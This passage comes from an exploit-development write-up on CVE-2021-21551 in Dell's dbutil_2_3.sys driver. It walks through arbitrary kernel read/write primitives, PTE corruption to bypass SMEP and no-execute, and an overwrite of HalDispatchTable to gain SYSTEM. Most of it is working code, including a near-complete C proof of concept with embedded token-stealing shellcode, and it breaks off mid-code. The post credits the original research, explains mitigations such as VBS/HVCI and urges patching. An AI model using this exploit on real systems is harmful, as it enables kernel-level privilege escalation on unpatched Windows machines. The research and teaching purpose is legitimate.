Then, we can clearly see that the value at the stack, plus 0x28 bytes, will be added to ECX. The final result is 0xFFFFF78042424242.

We then can see that before the call, another part of our buffer is moved into RDX as the source buffer. This allows us an arbitrary write primitive! A buffer we control will overwrite the pointer at the memory address we supply.

The issue, however, is with the destination address. We were attempting to target 0xFFFFF78000000800, but our address got mangled into 0xFFFFF78042424242. This is because it seems that the lower 32 bits of one of our user-supplied QWORDs first get added to the destination address. If we resend the exploit and replace the QWORD that was 0x4242424242424242 with 0x0000000000000000, we can "bypass" this issue: a value of 0 gets added, meaning our target address will remain unmangled.
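
Putting the layout pieced together above into code, a sketch of the write primitive's input buffer (assuming the QWORD that gets added to the destination sits at +0x10, the slot that held 0x4242424242424242), using the send_ioctl helper sketched earlier:

import struct

def write_what_where(where, what):
    # 0x20-byte input for IOCTL 0x9B0C1EC8, per the layout observed above:
    #   +0x00  unused padding
    #   +0x08  destination address (the "where")
    #   +0x10  value whose lower 32 bits get added to the destination - keep at 0
    #   +0x18  source data (the "what") that memmove copies to the destination
    return struct.pack("<4Q", 0, where, 0, what)

# e.g. repeat the KUSER_SHARED_DATA+0x800 test from above:
# send_ioctl(handle, IOCTL_ARBITRARY_WRITE,
#            write_what_where(0xFFFFF78000000800, 0x4343434343434343))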

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for an arbitrary write primitive, we can supply the “what” (our data) and the “where” (where do we write the data). However, recall the image two images above, showcasing our successful arguments, that since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel mode address. This means, at some point between the memmove call and our invocation of DeviceIoControl, our array of QWORDS was transferred to kernel mode, so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us - meaning the driver doesn’t create a pointer to that QWORD, we can directly supply it. And, since memmove will interpret that as a pointer, we can actually overwrite whatever we pass to the target buffer, which in this case is any address we want to corrupt.

What if, however, there was a way to do this in reverse? What if, in place of the kernel mode address that points to 0x4343434343434343 we could just supply our own memory address, instead of the driver creating a pointer to it, identically to how we control the target address we want to move memory to.

This means, instead of having something like this for the target address:

ffffc605`24e82998 43434343`43434343

What if we could just pass our own data as such:

43434343`43434343 DATA

Where 0x4343434343434343 is a value we supply, instead of having the kernel create a pointer to it for us. That way, when memmove interprets this address, it will interpret it as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could go one of two ways: option one would be to copy this data into our own pointer in C. However, since we see that none of our user-mode addresses are making it to the driver, and the driver is taking our buffer and placing it in kernel mode before leveraging it, the better option, perhaps, would be to supply an output buffer to DeviceIoControl and see if the memmove data gets written back to that output buffer.

The latter option makes sense, as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn't expecting unauthorized clients to call this IOCTL, meaning the input and output buffers are most likely being used by other kernel mode components and legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is more than likely expected behavior for the output buffer to contain memmove data. The problem is we need to find another memmove routine that allows us to essentially do the inverse of what we did with the arbitrary write primitive.

Talking to a peer of mine, VoidSec about my thought process, he pointed me towards Metasploit, which already has this concept outlined in their POC.

Doing a bit more reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into the sub_15294, we can see that this is the same memmove routine leveraged before.

However, since there is another IOCTL routine that invokes this memmove routine, this is a prime candidate to see if anything about this path is different (e.g. why create another routine to do the same thing twice? Perhaps this routine is used for something else, like reading memory or copying memory in a different way). Additionally, recall that when we performed an arbitrary write, the routines were indexing our buffer at 0x8 and 0x18. This could mean that the call to memmove, via the new IOCTL, could set up our buffer in a way that it is indexed at a different offset, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to attempt to trigger the new IOCTL and see if anything is returned in the output buffer. Essentially, we will set the second value, similar to last time, of our QWORD array to the value we want to interact with, in this case, read, and set everything else to 0. Then, we will reuse the same array of QWORDS as an output buffer and see if anything was written to the buffer.
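
Mirroring the write helper, a hedged sketch of that attempt looks like the following; the second QWORD carries the address to dereference, everything else stays zero, and (if the theory holds) the dereferenced value shows up in the last QWORD of the output buffer:

import struct

IOCTL_ARBITRARY_READ = 0x9B0C1EC4

def read_qword(handle, address):
    # Arbitrary read candidate: supply the address, read the result back out
    inbuf = struct.pack("<4Q", 0, address, 0, 0)
    out = send_ioctl(handle, IOCTL_ARBITRARY_READ, inbuf, out_len=len(inbuf))
    return struct.unpack("<4Q", out.ljust(0x20, b"\x00"))[3]

# e.g. read_qword(handle, 0xFFFFF78000000000)   # KUSER_SHARED_DATA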

We can use IDA to identify the proper offset within the driver that the cmp eax, 0x9B0C1EC4 lands on, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instructions, we can see our input buffer for the read primitive is being propagated and set up for the future call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

Then, the target address of KUSER_SHARED_DATA is loaded into RCX and then, as we can see, it will be loaded into RDX. This is great for us, as it means the 2nd argument for a function call on 64-bit systems on Windows is loaded into RDX. Since memmove accepts a pointer to a memory address, this means that this address will be the address that is dereferenced and then has its memory copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall that in our arbitrary write routine the second parameter, 0x4343434343434343, was pointed to by a kernel mode address. Look at the above image and see now that we control the address (0xFFFFF78000000000), but this time this address will be dereferenced and whatever it points to will be written to the buffer pointed to by RCX. Since in our last routine we controlled both arguments to memmove, we can expect that, although the value in RCX is in kernel mode, it will be bubbled back up into user mode and placed in our output buffer! We can see just before the return from memmove that the return value is the buffer into which the data was copied, and we can see the buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value KUSER_SHARED_DATA points to.

We really don’t need to do any more debugging/reverse engineering, as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see in our POC console that we have successfully performed an arbitrary read!

We indexed each element of the QWORD array we sent, per our code, and we can see that the last element contains the dereferenced contents of the address we wanted to read from! Now that we have a vanilla one-QWORD arbitrary read/write primitive, we can get into our exploitation path.

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

  1. Write our shellcode somewhere that is writable in the driver’s virtual address space
  2. Locate the base of the page table entries
  3. Calculate the address of the page table entry for the memory page where our shellcode lives
  4. Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
  5. Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard) (Note that if kCFG were fully enabled, VBS/HVCI would also be enabled, rendering this technique useless. kCFG does still have some functionality even when VBS/HVCI is disabled, like performing bitwise tests to ensure user-mode addresses aren’t called from kernel mode. This simply "circumvents" kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step).

First we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself, located in its .data section, which is already writable.

We can see that from the above image, we have a ton of room to work with, in terms of kernel mode writable memory. Our shellcode is approximately 9 QWORDS, so we will have more than enough room to place our shellcode here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel (for PTE indexing calculations) and the base address of the driver.
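
As a sketch, the final POC wraps this enumeration (EnumDeviceDrivers and GetDeviceDriverBaseNameA) in a kernelBase() helper and simply calls it twice:

// Resolve the load addresses needed for later calculations
unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");    // for the nt!MiGetPteAddress offset
unsigned long long driverBase = kernelBase("dbutil_2_3.sys");    // for the .data code cave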

Note that this assumes the process invoking this exploit is that of medium integrity.

The next step, since we know we want to write to an offset of 0x3000 (the offset to .data) + 0x10 (the offset to our code cave) from the base address of dbutil_2_3.sys, is to locate the page table entry for this memory address, which is already a kernel-mode page and is writable (you could also use KUSER_SHARED_DATA+0x800). In order to perform the calculations to locate the page table entry, we first need to bypass page table randomization, a mitigation introduced in Windows 10 after 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (the page table entries are an array of virtual addresses in this case). The kernel function nt!MiGetPteAddress dynamically contains, at an offset of 0x13, the base of the page table entries, as this kernel-mode function is what the kernel itself leverages to locate page table entries.

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, not on making this exploit portable. You’ll need to update this offset based on your patch level).

Here we can see that we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we can programmatically replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.
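
Concretely, the PTE calculation replicated from nt!MiGetPteAddress (and used verbatim in the final POC) looks like this, where pteBase is the value leaked via the read primitive:

// Bitwise operations to locate the PTE of the shellcode page
unsigned long long shellcodeLocation = driverBase + 0x3010;                  // .data + 0x10
unsigned long long shellcodePte = (shellcodeLocation >> 9) & 0x7FFFFFFFF8;   // index into the PTE array
shellcodePte = shellcodePte + pteBase;                                       // virtual address of the PTE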

Now that we have calculated the page table entry for where our shellcode will be written, let’s dereference it in order to preserve the bits the PTE contains, in terms of permissions, so we can modify this value later.

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After executing the updated POC, we can clearly see that the arbitrary write routines worked and that our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write; we need to make this an executable region of memory. Since we already have the PTE bits stored, we can update them in our exploit to clear the no-eXecute bit, then leverage our arbitrary write primitive to corrupt the page table entry and make the page read/write/execute (RWX)!
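
The bit manipulation itself is a single mask (this is exactly what the final POC does), clearing the no-eXecute bit in the preserved PTE value before writing it back with the write primitive:

// Clear the no-eXecute bit (the top bits of the preserved PTE value)
unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;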

Perfect! Now that we have made our memory region executable, we need to overwrite nt!HalDispatchTable+0x8 with this memory address. Then, when we invoke ntdll!NtQueryIntervalProfile from user mode, a call through this QWORD will be triggered! However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8, we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel-mode memory!
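
A sketch of the overwrite, using the same four-QWORD layout as before (halDispatch and shellcodeLocation are the values computed in the final POC):

// Overwrite nt!HalDispatchTable+0x8 with a pointer to our kernel-mode shellcode
unsigned long long inBuf[4];
inBuf[0] = 0x4141414141414141;
inBuf[1] = halDispatch;          // nt!HalDispatchTable+0x8
inBuf[2] = 0x0000000000000000;
inBuf[3] = shellcodeLocation;    // dbutil_2_3!.data + 0x10

DWORD bytesReturned = 0;

// 0x9B0C1EC8 is the arbitrary write IOCTL
DeviceIoControl(driverHandle, 0x9B0C1EC8, &inBuf, sizeof(inBuf), &inBuf, sizeof(inBuf), &bytesReturned, NULL);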

Perfect! At this point, if we invoke the pointer at nt!HalDispatchTable+0x8, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].
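
Resolving and invoking the function is straightforward (again, this mirrors the final POC):

// Resolve ntdll!NtQueryIntervalProfile and call it; the kernel eventually
// calls through [nt!HalDispatchTable+0x8], which now points to our shellcode
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(ULONG ProfileSource, PULONG Interval);

NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
    GetModuleHandle(TEXT("ntdll.dll")), "NtQueryIntervalProfile");

ULONG interval = 0;
NtQueryIntervalProfile(0x1234, &interval);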

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be called, even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call to nt!KeQueryIntervalProfile, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of nt!KeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8]; instead, we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see, though, that kCFG has some functionality in kernel mode even if it isn’t implemented at full scale. The routines still exist in the kernel; they would normally check a bitmap of all valid indirect call targets and determine whether the value about to be placed into RAX in the above image is a "valid target", meaning: at compile time, when the bitmap was created, did the address exist, and is it part of a valid control-flow transfer?

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can see that all this routine essentially does, since VBS isn’t enabled, is perform a bitwise test on the target address in RAX to confirm it isn’t a user-mode address (basically, it checks whether the address is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

“When Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone ‘There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, we can clearly see why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif, are optimal: they bypass pretty much any memory-corruption-related mitigation.

Note that VBS/HVCI actually creates an additional security boundary for us. Page table entries, when VBS is enabled, are actually managed by a higher security boundary, virtual trust level 1 - which is the secure kernel. This means it is not possible to perform PTE manipulation as we did. Additionally, even if this were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel - meaning that it also isn’t possible to manipulate the permissions of memory as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have also failed.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research: https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
{
  // Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
  LPVOID lpImageBase[1024];
  DWORD lpcbNeeded;
  int drivers;
  char lpFileName[1024];
  unsigned long long imageBase = 0;

  BOOL baseofDrivers = EnumDeviceDrivers(
    lpImageBase,
    sizeof(lpImageBase),
    &lpcbNeeded
  );

  // Error handling
  if (!baseofDrivers)
  {
    printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
    exit(1);
  }

  // Defining number of drivers for GetDeviceDriverBaseNameA()
  drivers = lpcbNeeded / sizeof(lpImageBase[0]);

  // Parsing loaded drivers
  for (int i = 0; i < drivers; i++)
  {
    GetDeviceDriverBaseNameA(
      lpImageBase[i],
      lpFileName,
      sizeof(lpFileName) / sizeof(char)
    );

    // Keep looping, until found, to find user supplied driver base address
    if (!strcmp(name, lpFileName))
    {
      imageBase = (unsigned long long)lpImageBase[i];

      // Exit loop
      break;
    }
  }

  return imageBase;
}


void exploitWork(void)
{
  // Store the base of the kernel
  unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

  // Storing the base of the driver
  unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

  // Print updates
  printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
  printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

  // Store nt!MiGetPteAddress+0x13
  unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

  // Obtain a handle to the driver
  HANDLE driverHandle = CreateFileA(
    "\\\\.\\DBUtil_2_3",
    FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (driverHandle == INVALID_HANDLE_VALUE)
  {
    printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

    // Buffer to send to the driver (read primitive)
    unsigned long long inBuf1[4];

    // Values to send
    unsigned long long one1 = 0x4141414141414141;
    unsigned long long two1 = ntmigetpteAddress;
    unsigned long long three1 = 0x0000000000000000;
    unsigned long long four1 = 0x0000000000000000;

    // Assign the values
    inBuf1[0] = one1;
    inBuf1[1] = two1;
    inBuf1[2] = three1;
    inBuf1[3] = four1;

    // Interact with the driver
    DWORD bytesReturned1 = 0;

    BOOL interact = DeviceIoControl(
      driverHandle,
      IOCTL_READ_CODE,
      &inBuf1,
      sizeof(inBuf1),
      &inBuf1,
      sizeof(inBuf1),
      &bytesReturned1,
      NULL
    );

    // Error handling
    if (!interact)
    {
      printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
      exit(-1);
    }
    else
    {
      // Last member of read array should contain base of the PTEs
      unsigned long long pteBase = inBuf1[3];

      printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

      // .data section of dbutil_2_3.sys contains a code cave
      unsigned long long shellcodeLocation = driverBase + 0x3010;

      // Bitwise operations to locate PTE of shellcode page
      unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
      shellcodePte = shellcodePte & 0x7FFFFFFFF8;
      shellcodePte = shellcodePte + pteBase;

      // Print update
      printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

      // Buffer to send to the driver (read primitive)
      unsigned long long inBuf2[4];

      // Values to send
      unsigned long long one2 = 0x4141414141414141;
      unsigned long long two2 = shellcodePte;
      unsigned long long three2 = 0x0000000000000000;
      unsigned long long four2 = 0x0000000000000000;

      inBuf2[0] = one2;
      inBuf2[1] = two2;
      inBuf2[2] = three2;
      inBuf2[3] = four2;

      // Parameter for DeviceIoControl
      DWORD bytesReturned2 = 0;

      BOOL interact1 = DeviceIoControl(
        driverHandle,
        IOCTL_READ_CODE,
        &inBuf2,
        sizeof(inBuf2),
        &inBuf2,
        sizeof(inBuf2),
        &bytesReturned2,
        NULL
      );

      // Error handling
      if (!interact1)
      {
        printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
      else
      {
        // Last member of read array should contain PTE bits
        unsigned long long pteBits = inBuf2[3];

        printf("[+] PTE bits for the shellcode page: %p\n", pteBits);

        /*
          ; Windows 10 1903 x64 Token Stealing Payload
          ; Author Connor McGarr

          [BITS 64]

          _start:
            mov rax, [gs:0x188]     ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]   ; Current process (_EPROCESS)
            mov rbx, rax        ; Copy current process (_EPROCESS) to rbx
          __loop:
            mov rbx, [rbx + 0x2f0]    ; ActiveProcessLinks
            sub rbx, 0x2f0          ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x2e8]    ; UniqueProcessId (PID)
            cmp rcx, 4          ; Compare PID to SYSTEM PID
            jnz __loop            ; Loop until SYSTEM PID is found

            mov rcx, [rbx + 0x360]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x360], rcx    ; Copy SYSTEM token to current process

            xor rax, rax        ; set NTSTATUS STATUS_SUCCESS
            ret             ; Done!

        */

        // One QWORD arbitrary write
        // Shellcode is 67 bytes (67/8 = 9 unsigned long longs)
        unsigned long long shellcode1 = 0x00018825048B4865;
        unsigned long long shellcode2 = 0x000000B8808B4800;
        unsigned long long shellcode3 = 0x02F09B8B48C38948;
        unsigned long long shellcode4 = 0x0002F0EB81480000;
        unsigned long long shellcode5 = 0x000002E88B8B4800;
        unsigned long long shellcode6 = 0x8B48E57504F98348;
        unsigned long long shellcode7 = 0xF0E180000003608B;
        unsigned long long shellcode8 = 0x4800000360888948;
        unsigned long long shellcode9 = 0x0000000000C3C031;

        // Buffers to send to the driver (write primitive)
        unsigned long long inBuf3[4];
        unsigned long long inBuf4[4];
        unsigned long long inBuf5[4];
        unsigned long long inBuf6[4];
        unsigned long long inBuf7[4];
        unsigned long long inBuf8[4];
        unsigned long long inBuf9[4];
        unsigned long long inBuf10[4];
        unsigned long long inBuf11[4];

        // Values to send
        unsigned long long one3 = 0x4141414141414141;
        unsigned long long two3 = shellcodeLocation;
        unsigned long long three3 = 0x0000000000000000;
        unsigned long long four3 = shellcode1;

        unsigned long long one4 = 0x4141414141414141;
        unsigned long long two4 = shellcodeLocation + 0x8;
        unsigned long long three4 = 0x0000000000000000;
        unsigned long long four4 = shellcode2;

        unsigned long long one5 = 0x4141414141414141;
        unsigned long long two5 = shellcodeLocation + 0x10;
        unsigned long long three5 = 0x0000000000000000;
        unsigned long long four5 = shellcode3;

        unsigned long long one6 = 0x4141414141414141;
        unsigned long long two6 = shellcodeLocation + 0x18;
        unsigned long long three6 = 0x0000000000000000;
        unsigned long long four6 = shellcode4;

        unsigned long long one7 = 0x4141414141414141;
        unsigned long long two7 = shellcodeLocation + 0x20;
        unsigned long long three7 = 0x0000000000000000;
        unsigned long long four7 = shellcode5;

        unsigned long long one8 = 0x4141414141414141;
        unsigned long long two8 = shellcodeLocation + 0x28;
        unsigned long long three8 = 0x0000000000000000;
        unsigned long long four8 = shellcode6;

        unsigned long long one9 = 0x4141414141414141;
        unsigned long long two9 = shellcodeLocation + 0x30;
        unsigned long long three9 = 0x0000000000000000;
        unsigned long long four9 = shellcode7;

        unsigned long long one10 = 0x4141414141414141;
        unsigned long long two10 = shellcodeLocation + 0x38;
        unsigned long long three10 = 0x0000000000000000;
        unsigned long long four10 = shellcode8;

        unsigned long long one11 = 0x4141414141414141;
        unsigned long long two11 = shellcodeLocation + 0x40;
        unsigned long long three11 = 0x0000000000000000;
        unsigned long long four11 = shellcode9;

        inBuf3[0] = one3;
        inBuf3[1] = two3;
        inBuf3[2] = three3;
        inBuf3[3] = four3;

        inBuf4[0] = one4;
        inBuf4[1] = two4;
        inBuf4[2] = three4;
        inBuf4[3] = four4;

        inBuf5[0] = one5;
        inBuf5[1] = two5;
        inBuf5[2] = three5;
        inBuf5[3] = four5;

        inBuf6[0] = one6;
        inBuf6[1] = two6;
        inBuf6[2] = three6;
        inBuf6[3] = four6;

        inBuf7[0] = one7;
        inBuf7[1] = two7;
        inBuf7[2] = three7;
        inBuf7[3] = four7;

        inBuf8[0] = one8;
        inBuf8[1] = two8;
        inBuf8[2] = three8;
        inBuf8[3] = four8;

        inBuf9[0] = one9;
        inBuf9[1] = two9;
        inBuf9[2] = three9;
        inBuf9[3] = four9;

        inBuf10[0] = one10;
        inBuf10[1] = two10;
        inBuf10[2] = three10;
        inBuf10[3] = four10;

        inBuf11[0] = one11;
        inBuf11[1] = two11;
        inBuf11[2] = three11;
        inBuf11[3] = four11;

        DWORD bytesReturned3 = 0;
        DWORD bytesReturned4 = 0;
        DWORD bytesReturned5 = 0;
        DWORD bytesReturned6 = 0;
        DWORD bytesReturned7 = 0;
        DWORD bytesReturned8 = 0;
        DWORD bytesReturned9 = 0;
        DWORD bytesReturned10 = 0;
        DWORD bytesReturned11 = 0;

        BOOL interact2 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf3,
          sizeof(inBuf3),
          &inBuf3,
          sizeof(inBuf3),
          &bytesReturned3,
          NULL
        );

        BOOL interact3 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf4,
          sizeof(inBuf4),
          &inBuf4,
          sizeof(inBuf4),
          &bytesReturned4,
          NULL
        );

        BOOL interact4 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf5,
          sizeof(inBuf5),
          &inBuf5,
          sizeof(inBuf5),
          &bytesReturned5,
          NULL
        );

        BOOL interact5 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf6,
          sizeof(inBuf6),
          &inBuf6,
          sizeof(inBuf6),
          &bytesReturned6,
          NULL
        );

        BOOL interact6 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf7,
          sizeof(inBuf7),
          &inBuf7,
          sizeof(inBuf7),
          &bytesReturned7,
          NULL
        );

        BOOL interact7 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf8,
          sizeof(inBuf8),
          &inBuf8,
          sizeof(inBuf8),
          &bytesReturned8,
          NULL
        );

        BOOL interact8 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf9,
          sizeof(inBuf9),
          &inBuf9,
          sizeof(inBuf9),
          &bytesReturned9,
          NULL
        );

        BOOL interact9 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf10,
          sizeof(inBuf10),
          &inBuf10,
          sizeof(inBuf10),
          &bytesReturned10,
          NULL
        );

        BOOL interact10 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf11,
          sizeof(inBuf11),
          &inBuf11,
          sizeof(inBuf11),
          &bytesReturned11,
          NULL
        );

        // A lot of error handling
        if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
        {
          printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          exit(-1);
        }
        else
        {
          printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

          // Clear the no-eXecute bit
          unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

          printf("[+] Corrupted PTE bits for the shellcode page: %p\n", taintedPte);

          // Clear the no-eXecute bit in the actual PTE
          // Buffer to send to the driver (write primitive)
          unsigned long long inBuf13[4];

          // Values to send
          unsigned long long one13 = 0x4141414141414141;
          unsigned long long two13 = shellcodePte;
          unsigned long long three13 = 0x0000000000000000;
          unsigned long long four13 = taintedPte;

          // Assign the values
          inBuf13[0] = one13;
          inBuf13[1] = two13;
          inBuf13[2] = three13;
          inBuf13[3] = four13;


          // Interact with the driver
          DWORD bytesReturned13 = 0;

          BOOL interact12 = DeviceIoControl(
            driverHandle,
            IOCTL_WRITE_CODE,
            &inBuf13,
            sizeof(inBuf13),
            &inBuf13,
            sizeof(inBuf13),
            &bytesReturned13,
            NULL
          );

          // Error handling
          if (!interact12)
          {
            printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          }
          else
          {
            printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

            // Offset to nt!HalDispatchTable+0x8
            unsigned long long halDispatch = baseofKernel + 0x427258;

            // Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
            // Buffer to send to the driver (write primitive)
            unsigned long long inBuf14[4];

            // Values to send
            unsigned long long one14 = 0x4141414141414141;
            unsigned long long two14 = halDispatch;
            unsigned long long three14 = 0x0000000000000000;
            unsigned long long four14 = 0x0000000000000000;

            // Assign the values
            inBuf14[0] = one14;
            inBuf14[1] = two14;
            inBuf14[2] = three14;
            inBuf14[3] = four14;

            // Interact with the driver
            DWORD bytesReturned14 = 0;

            BOOL interact13 = DeviceIoControl(
              driverHandle,
              IOCTL_READ_CODE,
              &inBuf14,
              sizeof(inBuf14),
              &inBuf14,
              sizeof(inBuf14),
              &bytesReturned14,
              NULL
            );

            // Error handling
            if (!interact13)
            {
              printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
            }
            else
            {
              // Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
              unsigned long long preservedHal = inBuf14[3];

              printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

              // Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
              // Buffer to send to the driver (write primitive)
              unsigned long long inBuf15[4];

              // Values to send
              unsigned long long one15 = 0x4141414141414141;
              unsigned long long two15 = halDispatch;
              unsigned long long three15 = 0x0000000000000000;
              unsigned long long four15 = shellcodeLocation;

              // Assign the values
              inBuf15[0] = one15;
              inBuf15[1] = two15;
